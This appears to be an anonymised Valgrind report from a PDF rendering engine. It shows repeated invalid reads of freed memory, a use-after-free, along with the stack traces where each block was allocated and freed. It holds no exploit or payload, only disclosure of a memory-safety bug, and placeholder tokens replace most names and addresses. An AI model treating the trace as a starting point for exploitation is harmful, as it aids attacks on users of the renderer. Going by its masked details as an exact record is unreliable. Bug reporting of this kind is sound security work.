(in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG 
by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG 
C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG 
APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is 
NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by 
NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by 
NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , 
APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afac is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was 
alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator new ](unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E9: APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG 
CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A NUMBERTAG strcmp_sse2_unaligned (strcmp sse2 APITAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG 
APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete[ void (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG E4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , 
Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG 